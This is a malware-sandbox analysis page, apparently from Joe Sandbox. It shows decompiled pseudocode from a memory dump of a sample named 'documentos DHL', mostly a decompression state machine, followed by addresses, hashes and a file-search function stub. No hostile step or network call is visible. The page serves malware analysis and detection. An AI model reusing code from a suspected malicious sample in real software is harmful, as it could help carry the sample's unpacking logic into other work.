								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								goto L89;
							}
							__eflags =  *(__ebp - 0x60);
							if( *(__ebp - 0x60) == 0) {
								goto L171;
							}
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							_t258 =  *(__ebp - 0x38) - 7 >= 0;
							__eflags = _t258;
							0 | _t258 = _t258 + _t258 + 9;
							 *(__ebp - 0x38) = _t258 + _t258 + 9;
							goto L75;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							L89:
							__eax =  *(__ebp - 4);
							 *(__ebp - 0x80) = 0x15;
							__eax =  *(__ebp - 4) + 0xa68;
							 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
							goto L68;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							goto L36;
						case 0xe:
							goto L45;
						case 0xf:
							goto L57;
						case 0x10:
							L109:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x10;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t365 = __ebp - 0x70;
							 *_t365 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t365;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							goto L111;
						case 0x11:
							L68:
							__esi =  *(__ebp - 0x58);
							 *(__ebp - 0x84) = 0x12;
							goto L132;
						case 0x12:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 0x58);
								 *(__ebp - 0x84) = 0x13;
								__esi =  *(__ebp - 0x58) + 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x4c);
							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							__eflags = __eax;
							__eax =  *(__ebp - 0x58) + __eax + 4;
							goto L130;
						case 0x13:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								_t469 = __ebp - 0x58;
								 *_t469 =  *(__ebp - 0x58) + 0x204;
								__eflags =  *_t469;
								 *(__ebp - 0x30) = 0x10;
								 *(__ebp - 0x40) = 8;
								L144:
								 *(__ebp - 0x7c) = 0x14;
								goto L145;
							}
							__eax =  *(__ebp - 0x4c);
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							 *(__ebp - 0x30) = 8;
							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
							L130:
							 *(__ebp - 0x58) = __eax;
							 *(__ebp - 0x40) = 3;
							goto L144;
						case 0x14:
							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
							__eax =  *(__ebp - 0x80);
							goto L140;
						case 0x15:
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
							goto L120;
						case 0x16:
							__eax =  *(__ebp - 0x30);
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx =  *(__ebp - 4);
							 *(__ebp - 0x40) = 6;
							__eax = __eax << 7;
							 *(__ebp - 0x7c) = 0x19;
							 *(__ebp - 0x58) = __eax;
							goto L145;
						case 0x17:
							L145:
							__eax =  *(__ebp - 0x40);
							 *(__ebp - 0x50) = 1;
							 *(__ebp - 0x48) =  *(__ebp - 0x40);
							goto L149;
						case 0x18:
							L146:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x18;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t484 = __ebp - 0x70;
							 *_t484 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t484;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L148:
							_t487 = __ebp - 0x48;
							 *_t487 =  *(__ebp - 0x48) - 1;
							__eflags =  *_t487;
							L149:
							__eflags =  *(__ebp - 0x48);
							if( *(__ebp - 0x48) <= 0) {
								__ecx =  *(__ebp - 0x40);
								__ebx =  *(__ebp - 0x50);
								0 = 1;
								__eax = 1 << __cl;
								__ebx =  *(__ebp - 0x50) - (1 << __cl);
								__eax =  *(__ebp - 0x7c);
								 *(__ebp - 0x44) = __ebx;
								goto L140;
							}
							__eax =  *(__ebp - 0x50);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
							__eax =  *(__ebp - 0x58);
							__esi = __edx + __eax;
							 *(__ebp - 0x54) = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								 *(__ebp - 0x50) = __edx;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L148;
							} else {
								goto L146;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								 *(__ebp - 0x2c) = __ebx;
								L119:
								_t393 = __ebp - 0x2c;
								 *_t393 =  *(__ebp - 0x2c) + 1;
								__eflags =  *_t393;
								L120:
								__eax =  *(__ebp - 0x2c);
								__eflags = __eax;
								if(__eax == 0) {
									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
									goto L170;
								}
								__eflags = __eax -  *(__ebp - 0x60);
								if(__eax >  *(__ebp - 0x60)) {
									goto L171;
								}
								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
								__eax =  *(__ebp - 0x30);
								_t400 = __ebp - 0x60;
								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
								__eflags =  *_t400;
								goto L123;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							 *(__ebp - 0x2c) = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								 *(__ebp - 0x48) = __ecx;
								L102:
								__eflags =  *(__ebp - 0x48);
								if( *(__ebp - 0x48) <= 0) {
									__eax = __eax + __ebx;
									 *(__ebp - 0x40) = 4;
									 *(__ebp - 0x2c) = __eax;
									__eax =  *(__ebp - 4);
									__eax =  *(__ebp - 4) + 0x644;
									__eflags = __eax;
									L108:
									__ebx = 0;
									 *(__ebp - 0x58) = __eax;
									 *(__ebp - 0x50) = 1;
									 *(__ebp - 0x44) = 0;
									 *(__ebp - 0x48) = 0;
									L112:
									__eax =  *(__ebp - 0x40);
									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
										_t391 = __ebp - 0x2c;
										 *_t391 =  *(__ebp - 0x2c) + __ebx;
										__eflags =  *_t391;
										goto L119;
									}
									__eax =  *(__ebp - 0x50);
									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
									__eax =  *(__ebp - 0x58);
									__esi = __edi + __eax;
									 *(__ebp - 0x54) = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
									__eflags =  *(__ebp - 0xc) - __edx;
									if( *(__ebp - 0xc) >= __edx) {
										__ecx = 0;
										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
										__ecx = 1;
										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
										__ebx = 1;
										__ecx =  *(__ebp - 0x48);
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx =  *(__ebp - 0x44);
										__ebx =  *(__ebp - 0x44) | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										 *(__ebp - 0x44) = __ebx;
										 *__esi = __ax;
										 *(__ebp - 0x50) = __edi;
									} else {
										 *(__ebp - 0x10) = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
										 *__esi = __dx;
									}
									__eflags =  *(__ebp - 0x10) - 0x1000000;
									if( *(__ebp - 0x10) >= 0x1000000) {
										L111:
										_t368 = __ebp - 0x48;
										 *_t368 =  *(__ebp - 0x48) + 1;
										__eflags =  *_t368;
										goto L112;
									} else {
										goto L109;
									}
								}
								__ecx =  *(__ebp - 0xc);
								__ebx = __ebx + __ebx;
								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
									__ecx =  *(__ebp - 0x10);
									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									 *(__ebp - 0x44) = __ebx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								if( *(__ebp - 0x10) >= 0x1000000) {
									L101:
									_t338 = __ebp - 0x48;
									 *_t338 =  *(__ebp - 0x48) - 1;
									__eflags =  *_t338;
									goto L102;
								} else {
									goto L99;
								}
							}
							__edx =  *(__ebp - 4);
							__eax = __eax - __ebx;
							 *(__ebp - 0x40) = __ecx;
							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
							goto L108;
						case 0x1a:
							goto L55;
						case 0x1b:
							L75:
							__eflags =  *(__ebp - 0x64);
							if( *(__ebp - 0x64) == 0) {
								 *(__ebp - 0x88) = 0x1b;
								goto L170;
							}
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							__eflags = __eax -  *(__ebp - 0x74);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
								__eflags = __eax;
							}
							__edx =  *(__ebp - 8);
							__cl =  *(__eax + __edx);
							__eax =  *(__ebp - 0x14);
							 *(__ebp - 0x5c) = __cl;
							 *(__eax + __edx) = __cl;
							__eax = __eax + 1;
							__edx = 0;
							_t274 = __eax %  *(__ebp - 0x74);
							__eax = __eax /  *(__ebp - 0x74);
							__edx = _t274;
							__eax =  *(__ebp - 0x68);
							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
							_t283 = __ebp - 0x64;
							 *_t283 =  *(__ebp - 0x64) - 1;
							__eflags =  *_t283;
							 *( *(__ebp - 0x68)) = __cl;
							goto L79;
						case 0x1c:
							while(1) {
								L123:
								__eflags =  *(__ebp - 0x64);
								if( *(__ebp - 0x64) == 0) {
									break;
								}
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__edx =  *(__ebp - 8);
								__cl =  *(__eax + __edx);
								__eax =  *(__ebp - 0x14);
								 *(__ebp - 0x5c) = __cl;
								 *(__eax + __edx) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t414 = __eax %  *(__ebp - 0x74);
								__eax = __eax /  *(__ebp - 0x74);
								__edx = _t414;
								__eax =  *(__ebp - 0x68);
								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
								__eflags =  *(__ebp - 0x30);
								 *( *(__ebp - 0x68)) = __cl;
								 *(__ebp - 0x14) = __edx;
								if( *(__ebp - 0x30) > 0) {
									continue;
								} else {
									goto L80;
								}
							}
							 *(__ebp - 0x88) = 0x1c;
							goto L170;
					}
				}
			}

0x00000000
0x00406aba
0x00406aba
0x00406abf
0x00406b36
0x00406b3d
0x00406b47
0x00407126
0x00407126
0x00407129
0x00407129
0x0040712f
0x00407135
0x0040713b
0x00407155
0x00407158
0x0040715e
0x00407169
0x0040716b
0x0040713d
0x0040713d
0x0040714c
0x00407150
0x00407150
0x00407175
0x0040719c
0x0040719c
0x004071a2
0x004071a2
0x00000000
0x00407177
0x00407177
0x0040717b
0x0040732a
0x00000000
0x0040732a
0x00407187
0x0040718e
0x00407196
0x00407199
0x00000000
0x00407199
0x00406ac1
0x00406ac1
0x00406ac5
0x00406acd
0x00406ad0
0x00406ad2
0x00406ad5
0x00406ad7
0x00406adc
0x00406adf
0x00406ae6
0x00406aed
0x00406af0
0x00406afb
0x00406b03
0x00406b03
0x00406afd
0x00406afd
0x00406afd
0x00406af2
0x00406af2
0x00406af2
0x00406b0a
0x00406b28
0x00406b2a
0x00406cfd
0x00406cfd
0x00406d00
0x00406d03
0x00406d06
0x00406d09
0x00406d0c
0x00406d0f
0x00406d12
0x00406d15
0x00406d1b
0x00406d33
0x00406d36
0x00406d39
0x00406d3c
0x00406d3c
0x00406d3f
0x00406d45
0x00406d1d
0x00406d1d
0x00406d25
0x00406d2a
0x00406d2c
0x00406d2e
0x00406d2e
0x00406d4f
0x00406d52
0x00406cf5
0x00406cfb
0x00000000
0x00000000
0x00000000
0x00406d54
0x00406cd0
0x00406cd4
0x004072dc
0x00000000
0x004072dc
0x00406cda
0x00406cdd
0x00406ce0
0x00406ce4
0x00406ce7
0x00406ced
0x00406cef
0x00406cef
0x00406cf2
0x00000000
0x00406cf2
0x00406b0c
0x00406b0c
0x00406b0f
0x00406b15
0x00406b17
0x00406b17
0x00406b1a
0x00406b1d
0x00406b1f
0x00406b20
0x00406b23
0x00406b90
0x00406b90
0x00406b94
0x00406b97
0x00406b9a
0x00406b9d
0x00406ba0
0x00406ba1
0x00406ba4
0x00406ba6
0x00406bac
0x00406baf
0x00406bb2
0x00406bb5
0x00406bb8
0x00406bbe
0x00406bda
0x00406bdd
0x00406be0
0x00406be3
0x00406bea
0x00406bf0
0x00406bf4
0x00406bc0
0x00406bc0
0x00406bc4
0x00406bcc
0x00406bd1
0x00406bd3
0x00406bd5
0x00406bd5
0x00406bfe
0x00406c01
0x00406b78
0x00406b78
0x00406b7e
0x00406c31
0x00406c37
0x00000000
0x00000000
0x00406c39
0x00406c3c
0x00406c3f
0x00406c42
0x00406c45
0x00406c48
0x00406c4b
0x00406c4e
0x00406c51
0x00406c57
0x00406c6f
0x00406c72
0x00406c75
0x00406c78
0x00406c78
0x00406c7b
0x00406c81
0x00406c59
0x00406c59
0x00406c61
0x00406c66
0x00406c68
0x00406c6a
0x00406c6a
0x00406c8b
0x00406c8e
0x00406c0c
0x00406c10
0x004072d0
0x00000000
0x004072d0
0x00406c16
0x00406c19
0x00406c1c
0x00406c20
0x00406c23
0x00406c29
0x00406c2b
0x00406c2b
0x00406c2e
0x00406c2e
0x00406c8e
0x00406c95
0x00406c95
0x00406c95
0x00406c99
0x00406c99
0x00406c9c
0x00406c9f
0x00406ca3
0x004072e8
0x00000000
0x004072e8
0x00406ca9
0x00406cac
0x00406caf
0x00406cb2
0x00406cb5
0x00406cb8
0x00406cbb
0x00406cbd
0x00406cc0
0x00406cc3
0x00406cc6
0x00406cc8
0x00406cc8
0x00406cc8
0x00406e65
0x00406e65
0x00406e68
0x00406e68
0x00000000
0x00406e68
0x00406b8a
0x00000000
0x00000000
0x00000000
0x00406c07
0x00406b53
0x00406b57
0x004072c4
0x00407340
0x00407348
0x0040734f
0x00407351
0x00407358
0x0040735c
0x0040735c
0x00406b5d
0x00406b60
0x00406b63
0x00406b67
0x00406b6a
0x00406b70
0x00406b72
0x00406b72
0x00406b75
0x00000000
0x00406b75
0x00406c01
0x00406b0a
0x0040693e
0x0040693e
0x00406947
0x00407355
0x00407355
0x00000000
0x00407355
0x0040694d
0x00000000
0x00406958
0x00000000
0x00000000
0x00406961
0x00406964
0x00406967
0x0040696b
0x00000000
0x00000000
0x00406971
0x00406974
0x00406976
0x00406977
0x0040697a
0x0040697c
0x0040697d
0x0040697f
0x00406982
0x00406987
0x0040698c
0x00406995
0x004069a8
0x004069ab
0x004069b7
0x004069df
0x004069e1
0x004069ef
0x004069ef
0x004069f3
0x00000000
0x00000000
0x00000000
0x00000000
0x004069e3
0x004069e3
0x004069e6
0x004069e7
0x004069e7
0x00000000
0x004069e3
0x004069bd
0x004069c2
0x004069c2
0x004069cb
0x004069d3
0x004069d6
0x00000000
0x004069dc
0x004069dc
0x00000000
0x004069dc
0x00000000
0x004069f9
0x004069f9
0x004069fd
0x004072a9
0x00000000
0x004072a9
0x00406a06
0x00406a16
0x00406a19
0x00406a1c
0x00406a1c
0x00406a1c
0x00406a1f
0x00406a23
0x00000000
0x00000000
0x00406a25
0x00406a2b
0x00406a55
0x00406a5b
0x00406a62
0x00000000
0x00406a62
0x00406a31
0x00406a34
0x00406a39
0x00406a39
0x00406a44
0x00406a4c
0x00406a4f
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406a94
0x00406a9a
0x00406a9d
0x00406aaa
0x00406ab2
0x00000000
0x00000000
0x00406a69
0x00406a69
0x00406a6d
0x004072b8
0x00000000
0x004072b8
0x00406a79
0x00406a84
0x00406a84
0x00406a84
0x00406a87
0x00406a8a
0x00406a8d
0x00406a92
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406d59
0x00406d5d
0x00406d7b
0x00406d7e
0x00406d85
0x00406d88
0x00406d8b
0x00406d8e
0x00406d91
0x00406d94
0x00406d96
0x00406d9d
0x00406d9e
0x00406da0
0x00406da3
0x00406da6
0x00406da9
0x00406da9
0x00406dae
0x00000000
0x00406dae
0x00406d5f
0x00406d62
0x00406d65
0x00406d6f
0x00000000
0x00000000
0x00406dc3
0x00406dc7
0x00406dea
0x00406ded
0x00406df0
0x00406dfa
0x00406dc9
0x00406dc9
0x00406dcc
0x00406dcf
0x00406dd2
0x00406ddf
0x00406de2
0x00406de2
0x00000000
0x00000000
0x00406e06
0x00406e0a
0x00000000
0x00000000
0x00406e10
0x00406e14
0x00000000
0x00000000
0x00406e1a
0x00406e1c
0x00406e20
0x00406e20
0x00406e23
0x00406e27
0x00000000
0x00000000
0x00406e77
0x00406e7b
0x00406e82
0x00406e85
0x00406e88
0x00406e92
0x00000000
0x00406e92
0x00406e7d
0x00000000
0x00000000
0x00406e9e
0x00406ea2
0x00406ea9
0x00406eac
0x00406eaf
0x00406ea4
0x00406ea4
0x00406ea4
0x00406eb2
0x00406eb5
0x00406eb8
0x00406eb8
0x00406ebb
0x00406ebe
0x00406ec1
0x00406ec1
0x00406ec4
0x00406ecb
0x00406ed0
0x00000000
0x00000000
0x00406f5e
0x00406f5e
0x00406f62
0x00407300
0x00000000
0x00407300
0x00406f68
0x00406f6b
0x00406f6e
0x00406f72
0x00406f75
0x00406f7b
0x00406f7d
0x00406f7d
0x00406f7d
0x00406f80
0x00406f83
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406fe1
0x00406fe1
0x00406fe5
0x0040730c
0x00000000
0x0040730c
0x00406feb
0x00406fee
0x00406ff1
0x00406ff5
0x00406ff8
0x00406ffe
0x00407000
0x00407000
0x00407000
0x00407003
0x00000000
0x00000000
0x00406db1
0x00406db1
0x00406db4
0x00000000
0x00000000
0x004070f0
0x004070f4
0x00407116
0x00407119
0x00407123
0x00000000
0x00407123
0x004070f6
0x004070f9
0x004070fd
0x00407100
0x00407100
0x00407103
0x00000000
0x00000000
0x004071ad
0x004071b1
0x004071cf
0x004071cf
0x004071cf
0x004071d6
0x004071dd
0x004071e4
0x004071e4
0x00000000
0x004071e4
0x004071b3
0x004071b6
0x004071b9
0x004071bc
0x004071c3
0x00407107
0x00407107
0x0040710a
0x00000000
0x00000000
0x0040729e
0x004072a1
0x00000000
0x00000000
0x00406ed8
0x00406eda
0x00406ee1
0x00406ee2
0x00406ee4
0x00406ee7
0x00000000
0x00000000
0x00406eef
0x00406ef2
0x00406ef5
0x00406ef7
0x00406ef9
0x00406ef9
0x00406efa
0x00406efd
0x00406f04
0x00406f07
0x00406f15
0x00000000
0x00000000
0x004071eb
0x004071eb
0x004071ee
0x004071f5
0x00000000
0x00000000
0x004071fa
0x004071fa
0x004071fe
0x00407336
0x00000000
0x00407336
0x00407204
0x00407207
0x0040720a
0x0040720e
0x00407211
0x00407217
0x00407219
0x00407219
0x00407219
0x0040721c
0x0040721f
0x0040721f
0x0040721f
0x0040721f
0x00407222
0x00407222
0x00407226
0x00407286
0x00407289
0x0040728e
0x0040728f
0x00407291
0x00407293
0x00407296
0x00000000
0x00407296
0x00407228
0x0040722e
0x00407231
0x00407234
0x00407237
0x0040723a
0x0040723d
0x00407240
0x00407243
0x00407246
0x00407249
0x00407262
0x00407265
0x00407268
0x0040726b
0x0040726f
0x00407271
0x00407271
0x00407272
0x00407275
0x0040724b
0x0040724b
0x00407253
0x00407258
0x0040725a
0x0040725d
0x0040725d
0x00407278
0x0040727f
0x00000000
0x00407281
0x00000000
0x00407281
0x00000000
0x00406f1d
0x00406f20
0x00406f56
0x00407086
0x00407086
0x00407086
0x00407086
0x00407089
0x00407089
0x0040708c
0x0040708e
0x00407318
0x00000000
0x00407318
0x00407094
0x00407097
0x00000000
0x00000000
0x0040709d
0x004070a1
0x004070a4
0x004070a4
0x004070a4
0x00000000
0x004070a4
0x00406f22
0x00406f24
0x00406f26
0x00406f28
0x00406f2b
0x00406f2c
0x00406f2e
0x00406f30
0x00406f33
0x00406f36
0x00406f4c
0x00406f51
0x00406f89
0x00406f89
0x00406f8d
0x00406fb9
0x00406fbb
0x00406fc2
0x00406fc5
0x00406fc8
0x00406fc8
0x00406fcd
0x00406fcd
0x00406fcf
0x00406fd2
0x00406fd9
0x00406fdc
0x00407009
0x00407009
0x0040700c
0x0040700f
0x00407083
0x00407083
0x00407083
0x00000000
0x00407083
0x00407011
0x00407017
0x0040701a
0x0040701d
0x00407020
0x00407023
0x00407026
0x00407029
0x0040702c
0x0040702f
0x00407032
0x0040704b
0x0040704d
0x00407050
0x00407051
0x00407054
0x00407056
0x00407059
0x0040705b
0x0040705d
0x00407060
0x00407062
0x00407065
0x00407069
0x0040706b
0x0040706b
0x0040706c
0x0040706f
0x00407072
0x00407034
0x00407034
0x0040703c
0x00407041
0x00407043
0x00407046
0x00407046
0x00407075
0x0040707c
0x00407006
0x00407006
0x00407006
0x00407006
0x00000000
0x0040707e
0x00000000
0x0040707e
0x0040707c
0x00406f8f
0x00406f92
0x00406f94
0x00406f97
0x00406f9a
0x00406f9d
0x00406f9f
0x00406fa2
0x00406fa5
0x00406fa5
0x00406fa8
0x00406fa8
0x00406fab
0x00406fb2
0x00406f86
0x00406f86
0x00406f86
0x00406f86
0x00000000
0x00406fb4
0x00000000
0x00406fb4
0x00406fb2
0x00406f38
0x00406f3b
0x00406f3d
0x00406f40
0x00000000
0x00000000
0x00000000
0x00000000
0x00406e2a
0x00406e2a
0x00406e2e
0x004072f4
0x00000000
0x004072f4
0x00406e34
0x00406e37
0x00406e3a
0x00406e3d
0x00406e3f
0x00406e3f
0x00406e3f
0x00406e42
0x00406e45
0x00406e48
0x00406e4b
0x00406e4e
0x00406e51
0x00406e52
0x00406e54
0x00406e54
0x00406e54
0x00406e57
0x00406e5a
0x00406e5d
0x00406e60
0x00406e60
0x00406e60
0x00406e63
0x00000000
0x00000000
0x004070a7
0x004070a7
0x004070a7
0x004070ab
0x00000000
0x00000000
0x004070b1
0x004070b4
0x004070b7
0x004070ba
0x004070bc
0x004070bc
0x004070bc
0x004070bf
0x004070c2
0x004070c5
0x004070c8
0x004070cb
0x004070ce
0x004070cf
0x004070d1
0x004070d1
0x004070d1
0x004070d4
0x004070d7
0x004070da
0x004070dd
0x004070e0
0x004070e4
0x004070e6
0x004070e9
0x00000000
0x004070eb
0x00000000
0x004070eb
0x004070e9
0x0040731e
0x00000000
0x00000000
0x0040694d

Memory Dump Source

Source File: 00000002.00000002.1820909988.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1820872214.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1820984430.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821027075.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821226779.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821266703.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821304765.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821344173.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821385079.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821445216.000000000045A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821491503.000000000045E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821620297.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_documentos DHL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c070ca994c387dc491d90c6da3338e95d076c4c889754936ff9c01511acbaf1
Instruction ID: 906bff5cfe4bf8fc25f5c52b70697fc94252e662920e9b50785524ea690ef068
Opcode Fuzzy Hash: 3c070ca994c387dc491d90c6da3338e95d076c4c889754936ff9c01511acbaf1
Instruction Fuzzy Hash: EBF17870D04229CBDF18CFA8C8946ADBBB1FF44305F15816ED856BB281D7386A86DF45

Uniqueness

Uniqueness Score: -1.00%

Function 004066F3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004066F3(WCHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileW(_a4, 0x426778); // executed
				if(_t2 == 0xffffffff) {
